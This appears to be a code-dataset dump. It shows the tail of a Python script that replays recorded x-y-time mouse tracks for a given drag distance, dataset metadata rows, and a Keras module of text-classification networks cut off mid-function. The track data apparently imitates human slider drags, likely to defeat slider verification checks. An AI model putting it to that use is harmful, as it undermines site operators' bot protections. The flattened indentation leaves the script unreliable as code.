'{-18,-19,0};{0,0,0};{2,0,256};{4,-1,266};{6,-1,272};{8,-3,282};{9,-3,297};{11,-3,313};{12,-3,360};{13,-4,376};{14,-4,433};{15,-4,449};{16,-4,456};{18,-4,473};{19,-4,520};{19,-4,542};{19,-4,543};{19,-4,543};{19,-4,544};{20,-4,546};{20,-4,549};{20,-4,549};{20,-4,549};{20,-4,550};{20,-4,550};{20,-4,552};{20,-4,552};{20,-4,553};{20,-4,554};{21,-4,585};{22,-4,633};{24,-4,657};{24,-4,678};{24,-4,678};{24,-4,678};{25,-4,728};{27,-4,777};{28,-4,809};{29,-4,858};{30,-4,880};{31,-4,889};{32,-4,920};{33,-4,936};{34,-4,960};{35,-4,984};{36,-4,992};{37,-4,1016};{38,-4,1056};{39,-4,1089};{40,-4,1144};{41,-4,1176};{42,-4,1203};{43,-4,1219};{44,-4,1241};{46,-4,1250};{48,-4,1283};{49,-4,1329};{51,-4,1377};{52,-4,1441};{54,-4,1504};{55,-4,1530};{56,-4,1536};{57,-4,1547};{58,-4,1553};{60,-4,1577};{61,-4,1594};{63,-4,1649};{64,-4,1672};{66,-4,1704};{67,-3,1754};{68,-3,1906};{69,-3,1912};{71,-3,1928};{72,-3,1945};{73,-3,1960};{74,-3,1977};{75,-3,1993};{75,-2,2001};{76,-2,2064};{77,-2,2072};{78,-2,2089};{79,-2,2233};{80,-2,2408};{81,-2,2416};{82,-2,2450};{83,-2,2504};{84,-2,2552};{85,-2,2640};{86,-2,2664};{88,-1,2697};{89,-1,2768};{90,-1,2785};{91,-1,3120};{92,-1,3168};{94,0,3184};{95,0,3224};{96,0,3249};{97,0,3280};{97,1,3304};{98,1,3369};{99,1,3401};{100,1,3448};{101,1,3546};{102,1,3601};{103,1,3656};{104,1,3794};{106,1,3809};{107,1,3825};{108,1,3842};{109,1,3928};{110,1,3976};{111,1,4000};{112,2,4096};{113,2,4224};{114,2,4240};{115,2,4276};{116,3,4296};{117,3,4338};{118,3,4354};{119,3,4392};{120,3,4409};{121,3,4417};{121,4,4424};{122,4,4457};{123,4,4472};{124,4,4512};{125,4,4584};{126,4,4634};{127,4,4656};{128,4,4704};{129,4,4713};{130,4,4728};{131,4,4760};{132,4,4777};{133,4,4784};{134,5,4792};{135,5,4801};{136,5,4809};{138,6,4840};{139,6,4864};{140,6,4888};{141,6,4899};{142,6,4912};{143,6,4946};{144,6,4961};{145,6,4968};{146,6,4994};{147,6,5010};{148,6,5032};{149,6,5080};{150,6,5121};{151,6,5136};{152,6,5241};{153,6,5305};{155,7,5328};{156,7,5489};{157,7,5544};{158,7,5624};{159,7,5632};{160,7,5696};{162,8,5800};{162,9,5824};{163,9,5856};{164,9,5897};{165,9,5912};{166,9,5954};{167,9,5955};{168,9,5968};{169,9,6032};{170,9,6072};{171,9,6108};{172,9,6128};{173,9,6225};{174,9,6256};{175,9,6272};{176,9,6368};{177,9,6416};{178,9,6456};{179,9,6560};{181,10,6600};{182,10,6696};{183,10,6744};{184,10,6760};{185,10,6888};{186,10,6936};{187,10,6976};{188,10,7096};{189,10,7104};{190,10,7129};{191,10,7177};{192,10,7193};{193,10,7200};{194,10,7248};{195,10,7264};{196,10,7280};{198,11,7320};{198,12,7344};{199,12,7352};{200,12,7448};{201,12,7512};{202,12,7521};{203,12,7664};{204,12,7680};{205,12,7720};{206,12,7786};{207,12,7824};{208,13,7840};{209,13,8008};{209,13,8042};',
'{-25,-20,0};{0,0,0};{-1,0,63};{-1,-1,79};{-1,-3,95};{0,-3,103};{0,-3,106};{0,-3,107};{0,-3,107};{0,-3,107};{0,-3,108};{0,-3,108};{0,-3,109};{0,-3,109};{0,-3,109};{1,-3,110};{2,-3,119};{5,-3,127};{8,-3,135};{9,-4,143};{12,-4,151};{15,-4,159};{19,-4,167};{23,-4,175};{28,-4,183};{33,-4,191};{37,-4,199};{42,-4,207};{49,-4,215};{57,-4,223};{62,-4,231};{71,-4,241};{77,-4,248};{77,-4,249};{77,-4,249};{77,-4,249};{86,-4,256};{91,-4,263};{95,-4,272};{100,-4,279};{103,-4,289};{107,-4,295};{111,-4,303};{115,-4,311};{118,-4,319};{120,-4,327};{124,-4,335};{127,-4,343};{128,-4,351};{130,-4,359};{132,-4,367};{134,-4,375};{137,-4,383};{139,-4,391};{140,-4,399};{141,-4,407};{142,-4,423};{143,-4,431};{144,-4,447};{145,-4,455};{146,-4,463};{148,-4,471};{150,-4,487};{151,-4,495};{154,-4,503};{157,-4,512};{158,-4,519};{160,-4,527};{162,-4,535};{164,-4,543};{165,-4,551};{166,-4,559};{167,-4,567};{168,-4,575};{169,-4,591};{170,-4,607};{171,-4,623};{172,-4,640};{174,-4,647};{175,-4,663};{176,-4,671};{177,-4,687};{178,-4,759};{179,-4,767};{180,-4,783};{181,-4,847};{182,-4,863};{183,-4,871};{184,-4,975};{185,-4,991};{186,-4,1056};{187,-4,1074};{188,-4,1079};{189,-4,1096};{189,-4,1463};',
'{-23,-18,0};{0,0,0};{0,0,0};{0,1,285};{1,1,293};{3,1,309};{5,1,317};{8,1,325};{11,1,336};{14,1,341};{15,1,351};{17,1,357};{19,1,366};{21,1,373};{22,1,382};{24,1,389};{26,1,398};{29,1,405};{32,1,414};{33,1,421};{36,1,429};{39,1,437};{40,1,445};{43,1,453};{44,1,461};{46,1,469};{47,1,477};{50,1,486};{51,1,501};{54,1,509};{55,1,518};{57,1,525};{58,1,534};{61,2,541};{62,2,550};{64,2,557};{66,2,566};{68,2,573};{69,2,589};{70,2,597};{72,2,605};{73,2,621};{74,2,630};{75,2,637};{76,2,653};{77,2,662};{78,2,669};{79,2,686};{80,2,695};{81,2,701};{82,2,717};{84,2,725};{86,2,741};{87,2,749};{88,2,765};{89,2,781};{91,2,814};{92,2,821};{93,2,829};{94,2,837};{96,2,845};{97,2,853};{99,2,862};{100,2,869};{101,2,878};{102,2,886};{103,2,901};{104,2,909};{105,2,917};{107,2,943};{108,2,949};{109,2,957};{110,2,965};{111,2,973};{112,2,981};{115,2,990};{116,2,1007};{118,2,1014};{120,2,1029};{121,2,1039};{123,2,1054};{124,2,1061};{125,2,1070};{126,2,1086};{128,2,1094};{130,2,1109};{132,1,1117};{134,1,1150};{135,1,1205};{137,1,1229};{138,1,1253};{139,1,1285};{140,1,1325};{140,1,1598};',
'{-11,-25,0};{0,0,0};{0,0,5};{3,1,229};{6,1,237};{8,1,245};{10,2,253};{11,2,262};{12,2,269};{13,2,278};{14,2,293};{16,2,333};{17,2,342};{18,2,373};{19,2,381};{20,2,389};{21,2,397};{22,2,406};{23,2,413};{24,2,421};{26,2,429};{27,2,437};{29,2,453};{30,2,477};{32,2,485};{33,2,493};{34,2,501};{35,2,509};{36,2,517};{38,2,525};{39,2,541};{40,2,558};{41,2,573};{42,2,581};{43,2,589};{45,2,597};{46,2,605};{48,2,613};{49,2,621};{52,2,629};{53,2,637};{56,2,645};{57,2,654};{59,2,661};{62,2,669};{67,2,677};{70,2,685};{73,2,693};{76,2,701};{78,2,709};{79,2,717};{81,2,725};{83,2,733};{85,2,749};{86,2,765};{88,2,773};{89,2,781};{90,2,789};{91,2,797};{92,2,813};{93,2,821};{94,2,829};{96,2,845};{96,3,854};{97,3,861};{98,3,877};{99,3,893};{100,3,902};{101,3,958};{102,3,1017};{103,3,1038};{104,3,1181};{105,3,1205};{107,4,1248};{108,4,1365};{109,4,1381};{110,4,1638};{110,4,1825};',
'{-16,-23,0};{0,0,0};{1,0,232};{5,0,240};{7,0,248};{9,0,255};{10,0,264};{12,0,272};{14,1,280};{15,1,288};{17,1,296};{18,1,304};{19,2,320};{21,2,328};{22,2,336};{24,3,345};{26,3,352};{29,3,360};{32,3,368};{34,3,376};{37,3,384};{40,3,393};{45,5,400};{49,5,408};{55,6,416};{63,6,423};{67,6,432};{73,6,440};{78,6,448};{82,6,456};{85,6,464};{88,6,472};{89,6,488};{92,6,495};{96,6,504};{99,6,512};{100,6,528};{102,6,600};{103,6,624};{106,6,632};{110,7,642};{114,7,648};{118,7,658};{122,7,664};{128,7,674};{135,7,680};{142,7,689};{146,7,696};{150,7,705};{153,7,712};{155,7,720};{158,7,727};{161,7,736};{164,7,744};{166,7,752};{168,7,759};{169,7,768};{172,7,775};{174,7,784};{176,7,792};{177,7,895};{176,7,1104};{173,7,1118};{171,7,1131};{170,7,1149};{169,7,1641};{168,7,1657};{167,7,1704};{167,7,2144};',
'{-10,-20,0};{0,0,0};{1,0,164};{2,0,212};{3,0,228};{4,0,244};{5,0,270};{6,0,277};{7,0,292};{8,0,309};{9,0,318};{10,0,324};{11,0,340};{12,0,356};{13,0,365};{14,0,388};{15,0,396};{16,0,404};{17,0,420};{18,0,429};{19,0,436};{20,0,468};{21,0,492};{22,0,524};{24,0,534};{25,0,550};{26,0,566};{27,0,572};{28,0,583};{30,0,597};{31,0,613};{33,0,630};{35,0,636};{36,0,646};{37,0,652};{39,0,661};{41,0,668};{43,0,677};{44,0,684};{45,0,692};{47,0,701};{48,0,716};{50,0,726};{51,0,748};{52,1,764};{53,1,780};{54,1,812};{55,1,820};{56,1,828};{57,1,845};{58,1,852};{59,1,861};{60,1,878};{61,1,884};{62,1,893};{63,1,900};{64,1,908};{65,1,916};{66,1,932};{68,1,941};{69,1,948};{70,2,964};{71,2,972};{72,2,980};{74,2,988};{75,2,1004};{77,2,1021};{78,2,1037};{80,2,1052};{80,3,1060};{81,3,1076};{83,3,1141};{84,3,1334};{86,3,1356};{87,3,1437};{87,2,1542};{86,2,1566};{84,1,1572};{83,1,1588};{81,1,1605};{80,1,1621};{79,1,1636};{78,1,1644};{77,1,1669};{76,0,1700};{76,0,2158};',
'{-27,-20,0};{0,0,0};{1,0,175};{2,0,183};{5,0,191};{6,0,200};{8,0,215};{9,0,225};{10,0,232};{11,0,240};{12,0,263};{13,0,273};{15,0,279};{17,0,295};{18,0,304};{21,0,312};{22,0,320};{24,0,328};{26,0,336};{28,0,343};{30,0,352};{33,0,359};{36,0,369};{39,0,375};{41,0,383};{44,0,391};{47,0,399};{49,0,407};{52,0,415};{54,0,423};{55,0,431};{58,0,439};{60,0,447};{63,0,456};{66,0,464};{69,0,471};{70,0,479};{73,0,487};{74,0,495};{76,0,504};{77,0,523};{79,0,527};{81,0,543};{84,0,553};{85,0,559};{86,0,570};{87,0,576};{89,0,589};{90,0,593};{92,0,601};{93,0,608};{95,0,624};{97,0,633};{99,1,640};{100,1,648};{101,1,656};{103,1,666};{104,2,672};{106,2,688};{107,2,696};{108,2,704};{109,2,713};{110,2,728};{111,2,736};{113,2,744};{114,2,760};{116,2,771};{117,2,776};{118,2,784};{120,3,792};{120,4,802};{121,4,816};{122,4,824};{123,4,834};{125,4,840};{126,4,856};{128,4,866};{129,4,880};{131,4,904};{132,4,936};{133,4,944};{134,4,960};{135,4,976};{136,4,984};{137,4,992};{139,4,1008};{140,4,1016};{141,4,1024};{142,4,1032};{143,4,1040};{144,4,1048};{145,4,1064};{146,4,1072};{147,4,1080};{148,4,1113};{149,4,1121};{150,4,1152};{151,4,1688};{152,4,1818};{152,4,2331};'
]
# return source_track
# Line endings differ between Linux and Windows; convert the pickle from DOS to Unix format
# original = "t_dict_unix.pkl"
# destination = "t_dict.pkl"
#
# content = ''
# outsize = 0
# with open(original, 'rb') as infile:
# content = infile.read()
# with open(destination, 'wb') as output:
# for line in content.splitlines():
# outsize += len(line) + 1
# output.write(line + str.encode('\n'))
t_dict = pickle.load(open('t_dict_unix.pkl', 'rb'))
if str(dist) in t_dict:
print('in file %s' % dist)
return t_dict[str(dist)], 1
if str(dist - 1) in t_dict:
print('in file %s-1' % (dist))
return t_dict[str(dist - 1)], 1
if str(dist + 1) in t_dict:
print('in file %s+1' % (dist))
return t_dict[str(dist + 1)], 1
if str(dist - 2) in t_dict:
print('in file %s-2' % (dist))
return t_dict[str(dist - 2)], 1
if str(dist + 2) in t_dict:
print('in file %s+2' % (dist))
return t_dict[str(dist + 2)], 1
# Before t_dict.pkl was saved, values from source_track were used instead
# If t_dict is complete enough, execution never reaches this point and the code below can be commented out
# If some low-probability distance does not appear in t_dict, cut a segment from a track in source_track
s = '{%d,' % dist
print(s)
tmp_track_list = []
for item in source_track[:]:
if s in item:
tmp_track_list.append(item)
if len(tmp_track_list) > 0:
return random.sample(tmp_track_list, 1)[0], 0
else:
return source_track[0], 0
def choice_track(dist):
track, tag = choice_track_list(dist) # tag == 1 means the track comes from the recorded training tracks
# Normalize the track data into [[x, y, t], ...] (a hedged parser sketch follows after this function)
track_list = format_track(track) # list of track points
# If tag == 0, the track does not come from the collected track file (it comes from the candidate list),
# so build a path of the required length instead
if tag != 1:
# Uses a crude algorithm to generate the track; rewriting it is recommended
new_track_list = get_trace_fast(dist)
else:
# tag == 1: the track data comes from the file and is used directly
new_track_list = track_list
return new_track_list
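# --- Hedged sketch (not part of the original script) ---
# format_track and get_trace_fast are defined elsewhere in the project and are
# not shown in this excerpt. Judging from the stored track strings above
# (semicolon-separated "{x,y,t}" triples), a minimal parser along these lines
# could turn one of them into the [[x, y, t], ...] form mentioned in the
# comments; the exact meaning of the first triple is an assumption.
def parse_track_string(track):
    points = []
    for chunk in track.strip(';').split(';'):
        x, y, t = (int(v) for v in chunk.strip('{}').split(','))
        points.append([x, y, t])
    return points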
if __name__ == '__main__':
print(choice_track(76))
| 104.047244
| 2,695
| 0.556153
| 2,918
| 13,214
| 2.493831
| 0.306374
| 0.010994
| 0.011131
| 0.009345
| 0.072832
| 0.060052
| 0.052219
| 0.03889
| 0.02982
| 0.02982
| 0
| 0.452731
| 0.08264
| 13,214
| 127
| 2,696
| 104.047244
| 0.147583
| 0.046315
| 0
| 0.043478
| 0
| 0.086957
| 0.772203
| 0.76465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054348
| false
| 0.054348
| 0.032609
| 0
| 0.206522
| 0.076087
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
18eb3a79ba81205a75211cfada12a019cf85f9aa
| 19,907
|
py
|
Python
|
src/steps/keras/architectures.py
|
kant/open-solution-mapping-challenge
|
c3b2058b80edbeef0633939ed8e33f181b77a9c5
|
[
"MIT"
] | 200
|
2018-04-16T09:06:38.000Z
|
2020-01-19T04:04:56.000Z
|
src/steps/keras/architectures.py
|
kant/open-solution-mapping-challenge
|
c3b2058b80edbeef0633939ed8e33f181b77a9c5
|
[
"MIT"
] | 83
|
2018-04-22T21:50:22.000Z
|
2019-12-18T03:29:59.000Z
|
src/steps/keras/architectures.py
|
kant/open-solution-mapping-challenge
|
c3b2058b80edbeef0633939ed8e33f181b77a9c5
|
[
"MIT"
] | 56
|
2018-04-16T11:10:03.000Z
|
2020-01-17T20:10:33.000Z
|
from keras import regularizers
from keras.activations import relu
from keras.layers import Input, Embedding, PReLU, Bidirectional, Lambda, \
CuDNNLSTM, CuDNNGRU, Conv1D, Dense, BatchNormalization, Dropout, SpatialDropout1D, \
GlobalMaxPool1D, GlobalAveragePooling1D, MaxPooling1D
from keras.layers.merge import add, concatenate
from keras.models import Model
from .contrib import AttentionWeightedAverage
def scnn(embedding_matrix, embedding_size, trainable_embedding, maxlen, max_features,
filter_nr, kernel_size, repeat_block, dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, conv_dropout, dense_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
input_text = Input(shape=(maxlen,))
x = Embedding(max_features, embedding_size, weights=[embedding_matrix], trainable=trainable_embedding)(
input_text)
x = dropout_block(dropout_embedding, dropout_mode)(x)
for _ in range(repeat_block):
x = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
def dpcnn(embedding_matrix, embedding_size, trainable_embedding, maxlen, max_features,
filter_nr, kernel_size, repeat_block, dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, conv_dropout, dense_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
"""
Note:
Implementation of http://ai.tencent.com/ailab/media/publications/ACL3-Brady.pdf
post activation is used instead of pre-activation, could be worth exploring
"""
input_text = Input(shape=(maxlen,))
if embedding_matrix is not None:
embedding = Embedding(max_features, embedding_size,
weights=[embedding_matrix], trainable=trainable_embedding)(input_text)
else:
embedding = Embedding(max_features, embedding_size)(input_text)
embedding = dropout_block(dropout_embedding, dropout_mode)(embedding)
x = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(embedding)
x = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(x)
if embedding_size == filter_nr:
x = add([embedding, x])
else:
embedding_resized = shape_matching_layer(filter_nr, use_prelu, conv_kernel_reg_l2, conv_bias_reg_l2)(embedding)
x = add([embedding_resized, x])
for _ in range(repeat_block):
x = dpcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
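# --- Hedged sketch (not part of the original module) ---
# The dpcnn docstring above notes that post-activation (Conv1D -> BN/activation)
# is used instead of pre-activation. A pre-activation variant of
# convolutional_block, written in the same closure style, would simply swap the
# order; this is an illustrative sketch, not something shipped by the original
# authors.
def pre_activation_convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu,
                                       dropout, dropout_mode,
                                       kernel_reg_l2, bias_reg_l2, batch_norm_first):
    def f(x):
        # BN -> activation -> dropout first ...
        x = bn_relu_dropout_block(use_batch_norm=use_batch_norm,
                                  batch_norm_first=batch_norm_first,
                                  dropout=dropout,
                                  dropout_mode=dropout_mode,
                                  use_prelu=use_prelu)(x)
        # ... then the convolution
        x = Conv1D(filter_nr, kernel_size=kernel_size, padding='same', activation='linear',
                   kernel_regularizer=regularizers.l2(kernel_reg_l2),
                   bias_regularizer=regularizers.l2(bias_reg_l2))(x)
        return x
    return f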
def cudnn_lstm(embedding_matrix, embedding_size, trainable_embedding,
maxlen, max_features,
unit_nr, repeat_block,
dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, rnn_dropout, dense_dropout, dropout_mode,
rnn_kernel_reg_l2, rnn_recurrent_reg_l2, rnn_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
input_text = Input(shape=(maxlen,))
if embedding_matrix is not None:
x = Embedding(max_features,
embedding_size,
weights=[embedding_matrix],
trainable=trainable_embedding)(input_text)
else:
x = Embedding(max_features,
embedding_size)(input_text)
x = dropout_block(dropout_embedding, dropout_mode)(x)
for _ in range(repeat_block):
x = cudnn_lstm_block(unit_nr=unit_nr, return_sequences=True, bidirectional=True,
kernel_reg_l2=rnn_kernel_reg_l2,
recurrent_reg_l2=rnn_recurrent_reg_l2,
bias_reg_l2=rnn_bias_reg_l2,
use_batch_norm=use_batch_norm, batch_norm_first=batch_norm_first,
dropout=rnn_dropout, dropout_mode=dropout_mode, use_prelu=use_prelu)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
def cudnn_gru(embedding_matrix, embedding_size, trainable_embedding,
maxlen, max_features,
unit_nr, repeat_block,
dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, rnn_dropout, dense_dropout, dropout_mode,
rnn_kernel_reg_l2, rnn_recurrent_reg_l2, rnn_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
input_text = Input(shape=(maxlen,))
if embedding_matrix is not None:
x = Embedding(max_features,
embedding_size,
weights=[embedding_matrix],
trainable=trainable_embedding)(input_text)
else:
x = Embedding(max_features,
embedding_size)(input_text)
x = dropout_block(dropout_embedding, dropout_mode)(x)
for _ in range(repeat_block):
x = cudnn_gru_block(unit_nr=unit_nr, return_sequences=True, bidirectional=True,
kernel_reg_l2=rnn_kernel_reg_l2,
recurrent_reg_l2=rnn_recurrent_reg_l2,
bias_reg_l2=rnn_bias_reg_l2,
use_batch_norm=use_batch_norm, batch_norm_first=batch_norm_first,
dropout=rnn_dropout, dropout_mode=dropout_mode, use_prelu=use_prelu)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
def vdcnn(embedding_size, maxlen, max_features,
filter_nr, kernel_size, repeat_block, dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout_embedding, conv_dropout, dense_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2,
dense_kernel_reg_l2, dense_bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
"""
Note:
Implementation of http://www.aclweb.org/anthology/E17-1104
We didn't use k-max pooling but GlobalMaxPool1D at the end and didn't explore it in the
intermediate layers.
"""
input_text = Input(shape=(maxlen,))
x = Embedding(input_dim=max_features, output_dim=embedding_size)(input_text)
x = dropout_block(dropout_embedding, dropout_mode)(x)
x = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first)(x)
for i in range(repeat_block):
if i + 1 != repeat_block:
x = vdcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first, last_block=False)(x)
else:
x = vdcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, conv_dropout, dropout_mode,
conv_kernel_reg_l2, conv_bias_reg_l2, batch_norm_first, last_block=True)(x)
predictions = classification_block(dense_size=dense_size, repeat_dense=repeat_dense,
output_size=output_size, output_activation=output_activation,
max_pooling=max_pooling,
mean_pooling=mean_pooling,
weighted_average_attention=weighted_average_attention,
concat_mode=concat_mode,
dropout=dense_dropout,
kernel_reg_l2=dense_kernel_reg_l2, bias_reg_l2=dense_bias_reg_l2,
use_prelu=use_prelu, use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first)(x)
model = Model(inputs=input_text, outputs=predictions)
return model
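# --- Hedged sketch (not part of the original module) ---
# The note in vdcnn() above says k-max pooling was not used, only GlobalMaxPool1D.
# For reference, a k-max pooling block in the same closure style could look
# roughly like this; it assumes a TensorFlow backend and that `filter_nr`
# channels come out of the preceding convolutional block.
def kmax_pooling_block(k, filter_nr):
    import tensorflow as tf  # assumption: Keras is running on the TensorFlow backend
    def f(x):
        def _kmax(t):
            t = tf.transpose(t, [0, 2, 1])  # (batch, channels, timesteps)
            top_k = tf.nn.top_k(t, k=k, sorted=True).values  # (batch, channels, k)
            return tf.reshape(top_k, (-1, filter_nr * k))
        return Lambda(_kmax, output_shape=(filter_nr * k,))(x)
    return f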
def classification_block(dense_size, repeat_dense, output_size, output_activation,
max_pooling, mean_pooling, weighted_average_attention, concat_mode,
dropout,
kernel_reg_l2, bias_reg_l2,
use_prelu, use_batch_norm, batch_norm_first):
def f(x):
if max_pooling:
x_max = GlobalMaxPool1D()(x)
else:
x_max = None
if mean_pooling:
x_mean = GlobalAveragePooling1D()(x)
else:
x_mean = None
if weighted_average_attention:
x_att = AttentionWeightedAverage()(x)
else:
x_att = None
x = [xi for xi in [x_max, x_mean, x_att] if xi is not None]
if len(x) == 1:
x = x[0]
else:
if concat_mode == 'concat':
x = concatenate(x, axis=-1)
else:
raise NotImplementedError('only mode concat for now')
for _ in range(repeat_dense):
x = dense_block(dense_size=dense_size,
use_batch_norm=use_batch_norm,
use_prelu=use_prelu,
dropout=dropout,
kernel_reg_l2=kernel_reg_l2,
bias_reg_l2=bias_reg_l2,
batch_norm_first=batch_norm_first)(x)
x = Dense(output_size, activation=output_activation)(x)
return x
return f
def dropout_block(dropout, dropout_mode):
def f(x):
if dropout_mode == 'spatial':
x = SpatialDropout1D(dropout)(x)
elif dropout_mode == 'simple':
x = Dropout(dropout)(x)
else:
raise NotImplementedError('spatial and simple modes are supported')
return x
return f
def prelu_block(use_prelu):
def f(x):
if use_prelu:
x = PReLU()(x)
else:
x = Lambda(relu)(x)
return x
return f
def bn_relu_dropout_block(use_batch_norm, use_prelu, dropout, dropout_mode, batch_norm_first):
def f(x):
if use_batch_norm and batch_norm_first:
x = BatchNormalization()(x)
x = prelu_block(use_prelu)(x)
x = dropout_block(dropout, dropout_mode)(x)
if use_batch_norm and not batch_norm_first:
x = BatchNormalization()(x)
return x
return f
def convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first):
def f(x):
x = Conv1D(filter_nr, kernel_size=kernel_size, padding='same', activation='linear',
kernel_regularizer=regularizers.l2(kernel_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2))(x)
x = bn_relu_dropout_block(use_batch_norm=use_batch_norm,
batch_norm_first=batch_norm_first,
dropout=dropout,
dropout_mode=dropout_mode,
use_prelu=use_prelu)(x)
return x
return f
def shape_matching_layer(filter_nr, use_prelu, kernel_reg_l2, bias_reg_l2):
def f(x):
x = Conv1D(filter_nr, kernel_size=1, padding='same', activation='linear',
kernel_regularizer=regularizers.l2(kernel_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2))(x)
x = prelu_block(use_prelu)(x)
return x
return f
def cudnn_lstm_block(unit_nr, return_sequences, bidirectional,
kernel_reg_l2, recurrent_reg_l2, bias_reg_l2,
use_batch_norm, batch_norm_first,
dropout, dropout_mode, use_prelu):
def f(x):
gru_layer = CuDNNLSTM(units=unit_nr, return_sequences=return_sequences,
kernel_regularizer=regularizers.l2(kernel_reg_l2),
recurrent_regularizer=regularizers.l2(recurrent_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2)
)
if bidirectional:
x = Bidirectional(gru_layer)(x)
else:
x = gru_layer(x)
x = bn_relu_dropout_block(use_batch_norm=use_batch_norm, batch_norm_first=batch_norm_first,
dropout=dropout, dropout_mode=dropout_mode,
use_prelu=use_prelu)(x)
return x
return f
def cudnn_gru_block(unit_nr, return_sequences, bidirectional,
kernel_reg_l2, recurrent_reg_l2, bias_reg_l2,
use_batch_norm, batch_norm_first,
dropout, dropout_mode, use_prelu):
def f(x):
gru_layer = CuDNNGRU(units=unit_nr, return_sequences=return_sequences,
kernel_regularizer=regularizers.l2(kernel_reg_l2),
recurrent_regularizer=regularizers.l2(recurrent_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2)
)
if bidirectional:
x = Bidirectional(gru_layer)(x)
else:
x = gru_layer(x)
x = bn_relu_dropout_block(use_batch_norm=use_batch_norm, batch_norm_first=batch_norm_first,
dropout=dropout, dropout_mode=dropout_mode,
use_prelu=use_prelu)(x)
return x
return f
def dense_block(dense_size, use_batch_norm, use_prelu, dropout, kernel_reg_l2, bias_reg_l2,
batch_norm_first):
def f(x):
x = Dense(dense_size, activation='linear',
kernel_regularizer=regularizers.l2(kernel_reg_l2),
bias_regularizer=regularizers.l2(bias_reg_l2))(x)
x = bn_relu_dropout_block(use_batch_norm=use_batch_norm,
use_prelu=use_prelu,
dropout=dropout,
dropout_mode='simple',
batch_norm_first=batch_norm_first)(x)
return x
return f
def dpcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
